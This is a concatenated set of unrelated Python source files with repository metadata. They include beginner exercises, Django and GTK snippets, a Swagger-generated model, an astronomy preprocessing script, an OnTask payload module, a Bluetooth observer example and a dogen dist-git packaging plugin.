breakg up code into discrete pieces of logic or functionality that are reusable
"""
"""
def function_name(parameters):
"function docstring"
statement1
statement2
...
...
return [expr]
"""
def f():
"First line is docstring. When called, a message will be displayed"
print ("Python functions are fun!")
return
"""
arguments
functions take arguements as inputs and perform some action on them
sometimes even return the results
arguments to a function are a list by default. that means they are positional
"""
def f(x):
"f of x returns x^2"
return x**2
print(f(2))
"""
lambdas! anonymous functions
usuaully used one time, inline
"""
square = lambda x : x * x
print(square(5))
# more typical one time use from https://book.pythontips.com/en/latest/map_filter.html
number_list = range(-5, 5)
less_than_zero = list(filter(lambda x: x < 0, number_list))
print(less_than_zero)
| 4.375
| 4
|
src/djangoreactredux/djrenv/lib/python3.5/site-packages/disposable_email_checker/fields.py
|
m2jobe/c_x
| 46
|
12784759
|
<reponame>m2jobe/c_x<gh_stars>10-100
# -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.core import validators
from .validators import validate_disposable_email
from .forms import DisposableEmailField as DisposableEmailFormField
class DisposableEmailField(models.EmailField):
default_validators = [validators.validate_email, validate_disposable_email]
description = _("Not a disposable email address")
def formfield(self, **kwargs):
# As with CharField, this will cause email validation to be performed
# twice.
defaults = {
'form_class': DisposableEmailFormField,
}
defaults.update(kwargs)
return super(DisposableEmailField, self).formfield(**defaults)
| 2.078125
| 2
|
test_tree_creator.py
|
mmokko/aoc2017
| 0
|
12784760
|
from unittest import TestCase
from day7 import TreeCreator
INPUT = '''pbga (66)
xhth (57)
ebii (61)
havc (66)
ktlj (57)
fwft (72) -> ktlj, cntj, xhth
qoyq (66)
padx (45) -> pbga, havc, qoyq
tknk (41) -> ugml, padx, fwft
jptl (61)
ugml (68) -> gyxo, ebii, jptl
gyxo (61)
cntj (57)'''
class TestTreeCreator(TestCase):
def test_create_tree(self):
sut = TreeCreator(INPUT)
sut.create()
self.assertEqual('tknk', sut.get_base_node().name)
def test_find_unbalanced_node(self):
sut = TreeCreator(INPUT)
sut.create()
self.assertEqual('ugml', sut.find_unbalanced_node().name)
self.assertEqual(60, sut.calculate_correct_weight_for_unbalanced_node(sut.find_unbalanced_node()))
| 3.34375
| 3
|
rainbow_walker.py
|
343max/led_lamp
| 0
|
12784761
|
<gh_stars>0
from process_pixel import process_pixel
from rpi_ws281x import Color
import asyncio
from helpers import hls_to_color
async def rainbow_walker(strip, wait_ms=10):
hue = 0
num_pixels = strip.numPixels()
badge_width = 60
while True:
for r in [
range(num_pixels - badge_width),
range(num_pixels - badge_width, 0, -1)
]:
for j in r:
for i in range(num_pixels):
strip.setPixelColor(i, process_pixel(0))
for k in range(j, j + badge_width):
strip.setPixelColor(k, process_pixel(hls_to_color(hue, 0.5, 1.0)))
strip.show()
hue += 0.001
if hue > 1:
hue = 0
await asyncio.sleep(wait_ms / 1000.0)
| 2.859375
| 3
|
witness/test_widgets2.py
|
robdelacruz/boneyard
| 0
|
12784762
|
import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk, Pango, Gdk, GLib
import datetime
import ui
import conv
def icon_image(icon_name):
theme = Gtk.IconTheme.get_default()
icon = theme.load_icon(icon_name, -1, Gtk.IconLookupFlags.FORCE_SIZE)
img = Gtk.Image.new_from_pixbuf(icon)
return img
class MainWin(Gtk.Window):
width = 300
height = int(width * 3/2)
def __init__(self):
super().__init__(border_width=0, title="ui test")
self.set_size_request(MainWin.width, MainWin.height)
txt = """Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party."""
txt2 = """1. Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party.
2. Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party.
3. Longer note. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party. Now is the time for all good men to come to the aid of the party."""
lbl = Gtk.Label()
lbl.set_hexpand(True)
lbl.set_xalign(0)
lbl.set_yalign(0)
lbl.set_line_wrap(True)
lbl.set_ellipsize(Pango.EllipsizeMode.END)
lbl.set_lines(2)
lbl.set_max_width_chars(5)
lbl.set_markup(txt2.strip().split("\n")[0])
self.add(ui.frame(lbl, "heading"))
self.connect("destroy", Gtk.main_quit)
self.show_all()
if __name__ == "__main__":
w = MainWin()
Gtk.main()
| 2.6875
| 3
|
modern_logic_client/models/customer.py
|
latourette359/modern_logic_client
| 0
|
12784763
|
# coding: utf-8
"""
Modern Logic Api
Manage and version your customer decision logic outside of your codebase # noqa: E501
OpenAPI spec version: 1.0.0
Contact: <EMAIL>
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class Customer(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'extra_properties': 'object',
'customer_id': 'str',
'first_name': 'str',
'last_name': 'str',
'email': 'str',
'phone': 'str',
'address_street': 'str',
'address_street2': 'str',
'address_city': 'str',
'address_state_code': 'str',
'address_zip': 'str',
'address_country_code': 'str',
'dob': 'date'
}
attribute_map = {
'extra_properties': 'extraProperties',
'customer_id': 'customerId',
'first_name': 'firstName',
'last_name': 'lastName',
'email': 'email',
'phone': 'phone',
'address_street': 'addressStreet',
'address_street2': 'addressStreet2',
'address_city': 'addressCity',
'address_state_code': 'addressStateCode',
'address_zip': 'addressZip',
'address_country_code': 'addressCountryCode',
'dob': 'dob'
}
def __init__(self, extra_properties=None, customer_id=None, first_name=None, last_name=None, email=None, phone=None, address_street=None, address_street2=None, address_city=None, address_state_code=None, address_zip=None, address_country_code=None, dob=None): # noqa: E501
"""Customer - a model defined in Swagger""" # noqa: E501
self._extra_properties = None
self._customer_id = None
self._first_name = None
self._last_name = None
self._email = None
self._phone = None
self._address_street = None
self._address_street2 = None
self._address_city = None
self._address_state_code = None
self._address_zip = None
self._address_country_code = None
self._dob = None
self.discriminator = None
if extra_properties is not None:
self.extra_properties = extra_properties
if customer_id is not None:
self.customer_id = customer_id
if first_name is not None:
self.first_name = first_name
if last_name is not None:
self.last_name = last_name
if email is not None:
self.email = email
if phone is not None:
self.phone = phone
if address_street is not None:
self.address_street = address_street
if address_street2 is not None:
self.address_street2 = address_street2
if address_city is not None:
self.address_city = address_city
if address_state_code is not None:
self.address_state_code = address_state_code
if address_zip is not None:
self.address_zip = address_zip
if address_country_code is not None:
self.address_country_code = address_country_code
if dob is not None:
self.dob = dob
@property
def extra_properties(self):
"""Gets the extra_properties of this Customer. # noqa: E501
:return: The extra_properties of this Customer. # noqa: E501
:rtype: object
"""
return self._extra_properties
@extra_properties.setter
def extra_properties(self, extra_properties):
"""Sets the extra_properties of this Customer.
:param extra_properties: The extra_properties of this Customer. # noqa: E501
:type: object
"""
self._extra_properties = extra_properties
@property
def customer_id(self):
"""Gets the customer_id of this Customer. # noqa: E501
Way that you uniquely identify customers # noqa: E501
:return: The customer_id of this Customer. # noqa: E501
:rtype: str
"""
return self._customer_id
@customer_id.setter
def customer_id(self, customer_id):
"""Sets the customer_id of this Customer.
Way that you uniquely identify customers # noqa: E501
:param customer_id: The customer_id of this Customer. # noqa: E501
:type: str
"""
self._customer_id = customer_id
@property
def first_name(self):
"""Gets the first_name of this Customer. # noqa: E501
Legal first name of the user being evaluated. # noqa: E501
:return: The first_name of this Customer. # noqa: E501
:rtype: str
"""
return self._first_name
@first_name.setter
def first_name(self, first_name):
"""Sets the first_name of this Customer.
Legal first name of the user being evaluated. # noqa: E501
:param first_name: The first_name of this Customer. # noqa: E501
:type: str
"""
self._first_name = first_name
@property
def last_name(self):
"""Gets the last_name of this Customer. # noqa: E501
Legal last name (surname) of the user being evaluated. # noqa: E501
:return: The last_name of this Customer. # noqa: E501
:rtype: str
"""
return self._last_name
@last_name.setter
def last_name(self, last_name):
"""Sets the last_name of this Customer.
Legal last name (surname) of the user being evaluated. # noqa: E501
:param last_name: The last_name of this Customer. # noqa: E501
:type: str
"""
self._last_name = last_name
@property
def email(self):
"""Gets the email of this Customer. # noqa: E501
Email address provided by user being evaluated. # noqa: E501
:return: The email of this Customer. # noqa: E501
:rtype: str
"""
return self._email
@email.setter
def email(self, email):
"""Sets the email of this Customer.
Email address provided by user being evaluated. # noqa: E501
:param email: The email of this Customer. # noqa: E501
:type: str
"""
self._email = email
@property
def phone(self):
"""Gets the phone of this Customer. # noqa: E501
Phone number of user being evaluated. # noqa: E501
:return: The phone of this Customer. # noqa: E501
:rtype: str
"""
return self._phone
@phone.setter
def phone(self, phone):
"""Sets the phone of this Customer.
Phone number of user being evaluated. # noqa: E501
:param phone: The phone of this Customer. # noqa: E501
:type: str
"""
self._phone = phone
@property
def address_street(self):
"""Gets the address_street of this Customer. # noqa: E501
Home address of user being evaluated # noqa: E501
:return: The address_street of this Customer. # noqa: E501
:rtype: str
"""
return self._address_street
@address_street.setter
def address_street(self, address_street):
"""Sets the address_street of this Customer.
Home address of user being evaluated # noqa: E501
:param address_street: The address_street of this Customer. # noqa: E501
:type: str
"""
self._address_street = address_street
@property
def address_street2(self):
"""Gets the address_street2 of this Customer. # noqa: E501
:return: The address_street2 of this Customer. # noqa: E501
:rtype: str
"""
return self._address_street2
@address_street2.setter
def address_street2(self, address_street2):
"""Sets the address_street2 of this Customer.
:param address_street2: The address_street2 of this Customer. # noqa: E501
:type: str
"""
self._address_street2 = address_street2
@property
def address_city(self):
"""Gets the address_city of this Customer. # noqa: E501
:return: The address_city of this Customer. # noqa: E501
:rtype: str
"""
return self._address_city
@address_city.setter
def address_city(self, address_city):
"""Sets the address_city of this Customer.
:param address_city: The address_city of this Customer. # noqa: E501
:type: str
"""
self._address_city = address_city
@property
def address_state_code(self):
"""Gets the address_state_code of this Customer. # noqa: E501
:return: The address_state_code of this Customer. # noqa: E501
:rtype: str
"""
return self._address_state_code
@address_state_code.setter
def address_state_code(self, address_state_code):
"""Sets the address_state_code of this Customer.
:param address_state_code: The address_state_code of this Customer. # noqa: E501
:type: str
"""
self._address_state_code = address_state_code
@property
def address_zip(self):
"""Gets the address_zip of this Customer. # noqa: E501
:return: The address_zip of this Customer. # noqa: E501
:rtype: str
"""
return self._address_zip
@address_zip.setter
def address_zip(self, address_zip):
"""Sets the address_zip of this Customer.
:param address_zip: The address_zip of this Customer. # noqa: E501
:type: str
"""
self._address_zip = address_zip
@property
def address_country_code(self):
"""Gets the address_country_code of this Customer. # noqa: E501
:return: The address_country_code of this Customer. # noqa: E501
:rtype: str
"""
return self._address_country_code
@address_country_code.setter
def address_country_code(self, address_country_code):
"""Sets the address_country_code of this Customer.
:param address_country_code: The address_country_code of this Customer. # noqa: E501
:type: str
"""
self._address_country_code = address_country_code
@property
def dob(self):
"""Gets the dob of this Customer. # noqa: E501
Date of birth for user being evaluated # noqa: E501
:return: The dob of this Customer. # noqa: E501
:rtype: date
"""
return self._dob
@dob.setter
def dob(self, dob):
"""Sets the dob of this Customer.
Date of birth for user being evaluated # noqa: E501
:param dob: The dob of this Customer. # noqa: E501
:type: date
"""
self._dob = dob
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(Customer, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, Customer):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 1.476563
| 1
|
scripts/preprocess.py
|
uiucsn/phast
| 0
|
12784764
|
<reponame>uiucsn/phast<filename>scripts/preprocess.py
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
import glob
import extinction
from astropy.cosmology import Planck13 as cosmo
#The limiting magnitude of your survey
MAG_LIM = 33.0
ZPT = 30.0
wvs = np.asarray([3600, 4760, 6215, 7545, 8700, 10150])
bands = 'ugrizY'
def shift_lc(df):
"""A code to compute the phase of transient data relative to
the time of trigger.
Parameters
----------
df : Pandas DataFrame
The full dataframe for each event, containing the columns
'MJD' and 'MJD_TRIGGER'.
Returns
-------
Pandas DataFrame
The same dataframe, but with the phase column 'T'.
"""
df['T'] = df['MJD'] - df['MJD_TRIGGER']
return df
def cut_lc(df, min=-30, max=150):
"""Short summary.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
min : float
The minimum phase (relative to trigger) at which to truncate photometry.
max : float
The maximum phase (relative to trigger) at which to truncate photometry.
Returns
-------
Pandas DataFrame
The same dataframe with truncated data.
"""
for idx, row in df.iterrows():
Times = row['T']
Flux = row['Flux']
Flux_Err = row['Flux_Err']
Filter = row['Filter']
MJD = row['MJD']
#truncate
ii = (Times > min) & (Times < max)
Flux = Flux[ii]
Flux_Err = Flux_Err[ii]
Times = Times[ii]
Filter = Filter[ii]
MJD = MJD[ii]
df.at[idx, 'T'] = Times
df.at[idx, 'Filter'] = Filter
df.at[idx, 'MJD'] = MJD
df.at[idx, 'Flux'] = Flux
df.at[idx, 'Flux_Err'] = Flux_Err
return df
def correct_time_dilation(df):
"""Short summary.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
Returns
-------
Pandas DataFrame
The same dataframe with undilated times.
"""
for idx, row in df.iterrows():
row['T'] = row['T'] / (1.+row.ZCMB)
return df
def correct_extinction(df, wvs):
"""Corrects photometry for milky way extinction (requires MWEBV in the pandas dataframe!).
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
wvs : array-like
Description of parameter `wvs`.
Returns
-------
type
Description of returned object.
"""
for idx, row in df.iterrows():
alams = extinction.fm07(wvs, row.MWEBV)
tempMag = np.array(row.Mag)
for i, alam in enumerate(alams):
if bands[i] in row.Filter:
ii = np.array(row.Filter)[0] == bands[i]
tempMag[ii] -= alam
df.at[idx, 'Mag'] = tempMag
return df
def calc_abs_mags(df, err_fill=1.0):
"""Converts apparent to absolute magnitudes and
fill in missing photometry.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
err_fill : float
The dummy uncertainty to report for filled-in values.
Returns
-------
Pandas DataFrame
The same dataframe with absolute magnitudes.
"""
df['Mag'] = [[np.nan]]*len(df)
df['Mag_Err'] = [[np.nan]]*len(df)
df['Abs_Lim_Mag'] = np.nan
for idx, row in df.iterrows():
k_correction = 2.5 * np.log10(1.+row.ZCMB)
dist = cosmo.luminosity_distance([row.ZCMB]).value[0] # returns dist in Mpc
abs_mags = -2.5 * np.log10(row.Flux) + ZPT - 5. * \
np.log10(dist*1e6/10.0) + k_correction
# Sketchy way to calculate error - update later
abs_mags_plus_err = -2.5 * np.log10(row.Flux + row.Flux_Err) + ZPT - 5. * \
np.log10(dist*1e6/10.0) + k_correction
abs_mags_err = np.abs(abs_mags_plus_err - abs_mags)
abs_lim_mag = MAG_LIM - 5.0 * np.log10(dist * 1e6 / 10.0) + \
k_correction
abs_mags_err[abs_mags != abs_mags] = err_fill
abs_mags[abs_mags != abs_mags] = abs_lim_mag
df.at[idx, 'Mag'] = abs_mags
df.at[idx, 'Mag_Err'] = abs_mags_err
df.at[idx, 'Abs_Lim_Mag'] = abs_lim_mag
return df
#def getGPLCs(df):
def stackInputs(df, params):
"""Some basic description
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
params : dict
Dictionary of all run params
Returns
-------
type
Description of returned object.
"""
LCs = {}
if params['GP']:
bands = params['bands'] #use all bands if we have gp-interpolation for them!
for idx, row in df.iterrows():
SN = row.CID
Time = row['T']
Mag = row.Mag
Mag_Err = row.Mag_Err
Filt = row.Filter
for i in np.arange(len(bands)):
band = bands[i]
bandTimes = Time[Filt==band]
bandMags = Mag[Filt==band]
bandErrs = Mag_Err[Filt==band]
if i==0:
matrix = [bandTimes]
else:
matrix.append([bandMags, bandErrs])
matrix = np.vstack(matrix)
LCs[row.CID] = matrix
else:
bands = params['band_stack']
#get max length of a matrix
maxLen = np.nanmax([len(x) for x in df['MJD'].values])
for idx, row in df.iterrows():
SN = row.CID
Time = row['T']
Mag = row.Mag
Mag_Err = row.Mag_Err
Filt = row.Filter
for band in bands:
matrix = np.zeros((maxLen, 3))
if np.nansum(Filt==band) == 0:
continue
bandTimes = Time[Filt==band]
bandMags = Mag[Filt==band]
bandErrs = Mag_Err[Filt==band]
padLen = maxLen - len(bandMags)
abs_mag_lim = df.at[idx, 'Abs_Lim_Mag'].astype(np.float64)
padR = int(padLen/2)
padF = padR
if padLen%2 == 1:
#pad more on the forward end than the back end
padF += 1
padArr_R = [abs_mag_lim]*padR
padErr_R = [1.0]*padR
padArr_F = [abs_mag_lim]*padF
padErr_F = [1.0]*padF
timePad_R = -np.arange(0,padR)*pad_cadence-pad_cadence + np.nanmin(bandTimes)
np.flip(timePad_R)
timePad_F = np.arange(0,padF)*pad_cadence + pad_cadence + np.nanmax(bandTimes)
#combine
stackTimes = np.concatenate([timePad_R, bandTimes, timePad_F])
stackMags = np.concatenate([padArr_R, bandMags, padArr_F])
stackErrs = np.concatenate([padErr_R, bandErrs, padErr_F])
matrix = np.vstack([stackTimes, stackMags, stackErrs])
LCs[row.CID] = matrix
return LCs
#def getGPLCs(df):
def stackGPInputs(df, bands='ugrizY'):
"""Some basic description
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
bands : type
Description of parameter `bands`.
Returns
-------
type
Description of returned object.
"""
LCs = {}
#get max length of a matrix
for idx, row in df.iterrows():
SN = row.CID
Time = row['GP_T']
Flux = row['GP_Flux']
Flux_Err = row['GP_Flux_Err']
Filt = row['GP_Filter']
#in the GP model, we're at the same time for everything
Time = Time[Filt == 'u'] #pick any band, doesn't matter
maxLen = len(Time)
for band in bands:
matrix = np.zeros((maxLen, len(bands)*2+1)) #ugrizY Flux, ugrizY err, time
bandFlux = Flux[Filt==band]
bandErrs = Flux_Err[Filt==band]
#get GP LCs
if bands == 'u':
matrix = np.vstack([stackTimes, bandFlux, bandErrs])
else:
matrix = np.vstack([matrix, bandFlux, bandErrs])
LCs[row.CID] = matrix
return LCs
def encode_classes(df):
"""Encodes the output classes as integers and returns a
dictionary of the encodings.
Parameters
----------
df : Pandas DataFrame
The dataframe containing the photometry of all events.
Returns
-------
Pandas DataFrame
The same dataframe with encoded column Type_ID.
Pandas dict
Dictionary of encoded classes.
"""
df['Type_ID'] = df['Type'].astype('category').cat.codes
#some clunky trickery to get the mapping from classes to values
encoding_dict = df[['Type', 'Type_ID']].drop_duplicates(subset=['Type', 'Type_ID']).sort_values(by='Type_ID').reset_index(drop=True)['Type'].to_dict()
return df, encoding_dict
| 2.40625
| 2
|
connect/cli/plugins/project/validators.py
|
cloudblue/product-sync
| 12
|
12784765
|
from interrogatio.core.exceptions import ValidationError
from interrogatio.validators import Validator
class PythonIdentifierValidator(Validator):
def validate(self, value, context=None):
if not value:
return
if not value.isidentifier():
raise ValidationError('Introduced data is not a valid Python identifier')
| 2.765625
| 3
|
ontask/action/payloads.py
|
LucasFranciscoCorreia/ontask_b
| 0
|
12784766
|
# -*- coding: utf-8 -*-
"""Classes capturing the payloads used when running actions."""
import collections
from typing import Dict, Mapping, Optional
from django.conf import settings
from django.contrib.sessions.backends.base import SessionBase
from django.contrib.sessions.models import Session
action_session_dictionary = 'action_run_payload'
class ActionPayload(collections.MutableMapping):
"""Objects to store the information required for action execution.
Look at the subclasses in this file for the different varieties
"""
fields = []
def __init__(self, initial_values=None):
"""Initialize the store and store given arguments."""
super().__init__()
self.store = {
'exclude_values': [],
'prev_url': '',
'post_url': '',
'button_label': '',
'valuerange': 0,
'step': 0,
}
if initial_values:
self.update(initial_values)
def __getitem__(self, key):
"""Verify that the key is in the allowed fields.
:param key: For lookup
:return: Value
"""
if settings.DEBUG:
if key not in self.fields:
raise Exception('Incorrect key: ' + key)
return self.store[self.__keytransform__(key)]
def __setitem__(self, key, item_value):
"""Verify that the key is in the allowed fields.
:param key: lookup
:param item_value: to be set
:return: Nothing
"""
if settings.DEBUG:
if key not in self.fields:
raise Exception('Incorrect key lookup.')
self.store[self.__keytransform__(key)] = item_value
def __delitem__(self, key): # noqa: Z434
"""Delete an item."""
del self.store[self.__keytransform__(key)] # noqa: Z420
def __iter__(self):
"""Return iterator."""
return iter(self.store)
def __len__(self):
"""Return length."""
return len(self.store)
def __keytransform__(self, key):
"""Transform the key."""
return key
def get_store(self):
"""Return the store."""
return self.store
class EmailPayload(ActionPayload):
"""Objects to store the information required for email execution.
Object to package the items required to carry out the email execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- subject: email subject
- item_column: Name of the column that contains the target email addresses
- cc_email: List of emails to include in the cc
- bcc_email: List of emails to include in the bcc
- confirm_items: Boolean encoding if a final item confirmation is needed
- send_confirmation: Boolean encoding if a confirmation email is required
- track_read: Boolean encoding if the email read is going to be tracked
- export_wf: Boolean encoding if the workflow needs to be exported
- exclude_values: Values in item_column that must be excluded
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'subject',
'item_column',
'cc_email',
'bcc_email',
'confirm_items',
'send_confirmation',
'track_read',
'export_wf',
'exclude_values',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
class SendListPayload(ActionPayload):
"""Objects to store the information required for send list execution.
Object to package the items required to carry out the execution of an
action of type send list. The object has the following fields:
- action id: PK for the action being executed
- subject: email subject
- email_to: Destination email
- cc_email: List of emails to include in the cc
- bcc_email: List of emails to include in the bcc
- export_wf: Boolean encoding if the workflow needs to be exported
"""
fields = [
'action_id',
'subject',
'email_to',
'cc_email',
'bcc_email',
'export_wf',
]
class CanvasEmailPayload(ActionPayload):
"""Objects to store the information required for Canvas Email execution.
Object to package the items required to carry out the JSON execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'subject',
'item_column',
'export_wf',
'target_url',
'confirm_items',
'exclude_values',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
class JSONPayload(ActionPayload):
"""Objects to store the information required for JSON execution.
Object to package the items required to carry out the JSON execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- token: for identification when making the request
- item_column: Column that contains the value to personalize
- exclude_values: Values in item_column that must be excluded
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'token',
'item_column',
'export_wf',
'confirm_items',
'exclude_values',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
class JSONListPayload(ActionPayload):
"""Object to store the information required for JSON List execution.
Object to package the items required to carry out the execution of a JSON
list action. The object has the following fields:
- action id: PK for the action being executed
- token: for identification when making the request
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'token',
'item_column',
'export_wf',
]
class ZipPayload(ActionPayload):
"""Objects to store the information required for JSON execution.
Object to package the items required to carry out the ZIP execution of an
action. The object has the following fields:
- action id: PK for the action being executed
- item_column: Column that contains the value to personalize
- exclude_values: Values in item_column that must be excluded
- prev_url: URL to go back to the previous step in the process
- post_url: URL to go next in the process
- button_label: To use the right button label in the web page
- valuerange: Range of steps considered
- step: current step on that range
"""
fields = [
'action_id',
'item_column',
'confirm_items',
'exclude_values',
'user_fname_column',
'file_suffix',
'zip_for_moodle',
'prev_url',
'post_url',
'button_label',
'valuerange',
'step',
]
def get_action_payload(session: SessionBase) -> Dict:
"""Get the payload from the current session.
:param session: Session object
:return: request.session[session_dictionary_name] or None
"""
return session.get(action_session_dictionary)
def set_action_payload(
session: SessionBase,
payload: Optional[Mapping] = None,
):
"""Set the payload in the current session.
:param session: Session object
:param payload: Dictionary to store
"""
session[action_session_dictionary] = payload
def get_or_set_action_info(
session: Session,
payloadclass,
action_info: Optional[ActionPayload] = None,
initial_values: Optional[Dict] = None,
) -> Optional[ActionPayload]:
"""Get (from the session object) or create an ActionPayload object.
First check if one is given. If not, check in the session. If there is no
object in the session, create a new one with the initial values.
:param session: HTTP session object
:param payloadclass: class to use to create a action_info object.
:param action_info: ActionInfo object just in case it is present.
:param initial_values: A dictionary to initialize the class if required
:return: Existing,newly created ActionInfo object, or None
"""
if action_info:
# Already exists, no need to create a new one
return action_info
action_info = session.get(action_session_dictionary)
if action_info:
return payloadclass(action_info)
if not initial_values:
# Nothing found in the session and no initial values given.
return None
# Create the object with the given class
action_info = payloadclass(initial_values)
session[action_session_dictionary] = action_info.get_store()
session.save()
return payloadclass(initial_values)
| 2.25
| 2
|
examples/basic_observer.py
|
ddunmire/python-bleson
| 103
|
12784767
|
<reponame>ddunmire/python-bleson
#!/usr/bin/env python3
import sys
from time import sleep
from bleson import get_provider, Observer
# Get the wait time from the first script argument or default it to 10 seconds
WAIT_TIME = int(sys.argv[1]) if len(sys.argv)>1 else 10
def on_advertisement(advertisement):
print(advertisement)
adapter = get_provider().get_adapter()
observer = Observer(adapter)
observer.on_advertising_data = on_advertisement
observer.start()
sleep(WAIT_TIME)
observer.stop()
| 2.671875
| 3
|
_python/python_stack/_python/assignments/forloop_basic_1.py
|
fatimaalheeh/python_stack
| 0
|
12784768
|
<filename>_python/python_stack/_python/assignments/forloop_basic_1.py
#1.
for onehundredfifty in range(151):
print(onehundredfifty)
#2.
for thousandFives in range(5,1001,5):
print(thousandFives)
#3.
for hundred in range(1,101):
if hundred%5==0:
print("Coding")
elif hundred%5!=0:
print("CodingDojo!")
else:
print(hundred)
#4.
sum =0
for halfmillion in range(500001):
if halfmillion%2!=0:
sum+=halfmillion
print(sum)
#5.
count = 2018
while count > 0:
print( count)
count -= 4
#6.
lowNum=2
highNum=9
mult=3
res=0
for i in range(lowNum,highNum):
if res < highNum:
res+=mult
print(res)
else:
break
| 3.96875
| 4
|
dogen/plugins/dist_git.py
|
jboss-dockerfiles/dogen
| 14
|
12784769
|
import os
import re
import subprocess
from dogen.tools import Tools, Chdir
from dogen.plugin import Plugin
class DistGitPlugin(Plugin):
@staticmethod
def info():
return "dist-git", "Support for dist-git repositories"
@staticmethod
def inject_args(parser):
parser.add_argument('--dist-git-enable', action='store_true', help='Enables dist-git plugin')
parser.add_argument('--dist-git-assume-yes', action='store_true', help='Skip interactive mode and answer all question with "yes"')
parser.add_argument('--dist-git-scratch', action='store_true', help='Scratch build')
parser.add_argument('--dist-git-tech-preview', action='store_true', help='Change the type of image to tech-preview')
return parser
def __init__(self, dogen, args):
super(DistGitPlugin, self).__init__(dogen, args)
if not self.args.dist_git_enable:
return
self.repo = None
self.branch = None
def prepare(self, cfg):
if not self.args.dist_git_enable:
return
dist_git_cfg = cfg.get('dogen', {}).get('plugins', {}).get('dist_git', None)
if dist_git_cfg:
self.repo = dist_git_cfg.get('repo')
self.branch = dist_git_cfg.get('branch')
if not (self.repo and self.branch):
raise Exception("Dit-git plugin was activated, but repository and branch was not correctly provided")
self.git = Git(self.log, self.output, os.path.dirname(self.descriptor), self.repo, self.branch, self.args.dist_git_assume_yes)
self.git.prepare()
self.git.clean()
def before_sources(self, cfg):
if not self.args.dist_git_enable:
return
if not self.args.dist_git_tech_preview:
return
name = cfg.get('name')
family, name = name.split('/')
tech_preview_name = "%s-tech-preview/%s" % (family, name)
self.log.info("Generating tech-preview image, updating image name to: %s" % tech_preview_name)
cfg['name'] = tech_preview_name
def after_sources(self, files):
if not self.args.dist_git_enable:
return
with Chdir(self.output):
self.update_lookaside_cache(files)
self.git.add()
if self.git.stage_modified():
self.git.commit()
self.git.push()
else:
self.log.info("No changes made to the code, committing skipped")
self.build()
def update_lookaside_cache(self, artifacts):
if not artifacts:
return
self.log.info("Updating lookaside cache...")
subprocess.check_output(["rhpkg", "new-sources"] + artifacts.keys())
self.log.info("Update finished.")
def build(self):
if self.args.dist_git_assume_yes or Tools.decision("Do you want to execute a build on OSBS?"):
self.log.info("Executing container build on OSBS...")
cmd = ["rhpkg", "container-build"]
if self.args.dist_git_scratch:
cmd.append('--scratch')
subprocess.call(cmd)
class Git(object):
"""
Git support for target directories
"""
@staticmethod
def repo_info(path):
with Chdir(path):
if subprocess.check_output(["git", "rev-parse", "--is-inside-work-tree"]).strip() != "true":
raise Exception("Directory %s doesn't seem to be a git repository. Please make sure you specified correct path." % path)
name = os.path.basename(subprocess.check_output(["git", "rev-parse", "--show-toplevel"]).strip())
branch = subprocess.check_output(["git", "rev-parse", "--abbrev-ref", "HEAD"]).strip()
commit = subprocess.check_output(["git", "rev-parse", "HEAD"]).strip()
return name, branch, commit
def __init__(self, log, output, source, repo, branch, noninteractive=False):
self.log = log
self.output = output
self.repo = repo
self.branch = branch
